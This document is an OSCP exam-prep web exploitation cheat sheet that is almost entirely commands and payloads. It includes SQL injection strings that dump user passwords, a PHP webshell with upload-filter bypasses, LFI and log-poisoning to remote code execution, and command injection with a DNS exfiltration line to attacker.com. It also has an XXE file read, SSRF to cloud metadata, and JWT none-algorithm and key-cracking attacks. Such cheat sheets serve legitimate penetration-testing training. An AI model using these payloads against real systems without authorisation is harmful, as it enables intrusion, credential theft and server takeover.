######################################################################
# 02 — WEB ENUMERATION & EXPLOITATION (OSCP 2025 — UPGRADED)
######################################################################

======================================================================
# 1. WEB ENUMERATION BASELINES
======================================================================

# Web fingerprinting
whatweb http://$targetip
curl -I http://$targetip
curl -v http://$targetip

# HTTPS certificate info
openssl s_client -connect $targetip:443 -servername $targetip </dev/null

# HTTP methods allowed
curl -X OPTIONS http://$targetip -i

# Virtual host enumeration
ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-20000.txt \
     -u http://$targetip -H "Host: FUZZ.$targetdomain" -fs 0

# Parameter enumeration
arjun -u http://$targetip/index.php

# Directory brute-force
gobuster dir -u http://$targetip -w /usr/share/wordlists/dirb/common.txt -o gobuster.txt

# Recursive brute-force
feroxbuster -u http://$targetip -w /usr/share/wordlists/dirb/common.txt -x php,txt,log,html,bak -o ferox.txt

# Look for common dev/backup paths
# /admin /backup /dev /config /uploads /.git /.svn /test /old /private


======================================================================
# 2. CMS ENUMERATION
======================================================================

# WordPress
wpscan --url http://$targetip --enumerate ap,at,cb,dbe,u

# Joomla
joomscan -u http://$targetip

# Drupal
droopescan scan drupal -u http://$targetip


======================================================================
# 3. API ENUMERATION
======================================================================

# Basic API discovery
curl http://$targetip/api/
curl http://$targetip/swagger/
curl http://$targetip/docs/

# Bruteforce API endpoints
ffuf -w /usr/share/wordlists/api.txt -u http://$targetip/FUZZ


======================================================================
# 4. SQL INJECTION – MANUAL TESTS
======================================================================

# Basic boolean tests
' OR '1'='1 --
" OR "1"="1 --
admin' --
admin' OR 1=1 --
') OR ('1'='1

# Numeric tests
1 OR 1=1--
1 AND 1=2--

# ORDER BY column count
?id=1 ORDER BY 1--
?id=1 ORDER BY 2--
?id=1 ORDER BY 3--

# UNION tests
?id=1 UNION SELECT NULL--
?id=1 UNION SELECT NULL,NULL--
?id=1 UNION SELECT 1,2,3--

# Dumping the database
?id=1 UNION SELECT database(),2,3--
?id=1 UNION SELECT table_name,2,3 FROM information_schema.tables--
?id=1 UNION SELECT column_name,2,3 FROM information_schema.columns WHERE table_name='users'--
?id=1 UNION SELECT username,password,3 FROM users--

# SQLMap (LAB only)
sqlmap -u "http://$targetip/login.php?user=admin" --batch --dbs


======================================================================
# 5. FILE UPLOAD → RCE
======================================================================

# Payload examples
shell.php
shell.php.jpg
shell.phtml
shell.php%00.jpg
shell.phar

# PHP webshell
<?php system($_GET['cmd']); ?>

# Executing:
http://$targetip/uploads/shell.php?cmd=id

# Upload bypass tricks
.php.jpg
.php;.jpg
.phtml
.phar
.php%00.png

# MIME-Type bypass
Content-Type: image/jpeg


======================================================================
# 6. LFI (LOCAL FILE INCLUSION)
======================================================================

# Basic tests
?page=../../../../etc/passwd
?page=../../../../etc/hosts
?page=../../../../windows/win.ini

# PHP filter wrapper
?page=php://filter/convert.base64-encode/resource=index.php

# Path traversal quick list:
../../../../
..%2f..%2f..%2f
..%252f..%252f


======================================================================
# 7. LFI → RCE (LOG POISONING)
======================================================================

# Poison the log
User-Agent: <?php system($_GET['cmd']); ?>

# Execute from log file
http://$targetip/vuln?page=/var/log/apache2/access.log&cmd=id

# Also try SSH log
/var/log/auth.log


======================================================================
# 8. COMMAND INJECTION
======================================================================

# Basic detection payloads
; id
&& whoami
| uname -a
`hostname`
$(id)

# Time-based blind
8.8.8.8; sleep 5

# DNS exfil test
8.8.8.8; nslookup attacker.com


======================================================================
# 9. SSTI (SERVER-SIDE TEMPLATE INJECTION)
======================================================================

# Generic tests
{{7*7}}
${7*7}
<%= 7*7 %>


======================================================================
# 10. XXE (XML External Entity)
======================================================================

<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>


======================================================================
# 11. CORS MISCONFIGURATION
======================================================================

# Check for wildcard misconfig
curl -I -H "Origin: evil.com" http://$targetip

# Vulnerable if:
Access-Control-Allow-Origin: *


======================================================================
# 12. JWT VULNERABILITY TESTS
======================================================================

# Decode token
jwt_tool token.jwt

# None algorithm attack
jwt_tool token.jwt -X a

# Brute-force key
jwt_tool token.jwt -C -d /usr/share/wordlists/rockyou.txt


======================================================================
# 13. SSRF BASIC TESTS
======================================================================

# Try internal metadata
url=http://127.0.0.1/
url=http://localhost/
url=http://169.254.169.254/latest/meta-data/


======================================================================
# 14. HTTP REQUEST SMUGGLING (quick tests)
======================================================================

# Possible smuggling header
Transfer-Encoding: chunked

# TE.CL vs CL.TE fuzzing
curl -H "Transfer-Encoding: chunked" -d "malicious" http://$targetip


======================================================================
# 15. COMMON BACKUP FILES TO CHECK
======================================================================

index.php~
index.php.bak
backup.zip
site.tar.gz
config.old
database.sql


======================================================================
# 16. WEB WORDLIST GENERATION
======================================================================

cewl http://$targetip -w words.txt
crunch 6 8 abc123 -o crunch.txt


======================================================================
# 17. OSCP WEB METHODOLOGY (CHECKLIST)
======================================================================

### STEP 1 — ENUMERATION
- whatweb
- gobuster / feroxbuster
- cert checks
- vhost brute-force
- parameter enumeration
- CMS enumeration

### STEP 2 — VULN DISCOVERY
- SQLi / LFI / RFI
- File upload bypass
- Auth bypass
- Command injection
- SSTI / XXE
- CORS / JWT
- SSRF tests

### STEP 3 — GAIN SHELL
- Webshell upload
- Log poisoning → LFI → RCE
- Command injection

### STEP 4 — STABILIZE
- TTY upgrade
- Reverse shell upgrade

### STEP 5 — PRIVESC
- Linux privesc enum
- Windows privesc enum

### STEP 6 — DOCUMENT EVERYTHING
- Commands
- Screenshots
- Proof.txt

######################################################################
# END — FULL OSCP WEB ENUM + EXPLOITATION (2025)
######################################################################
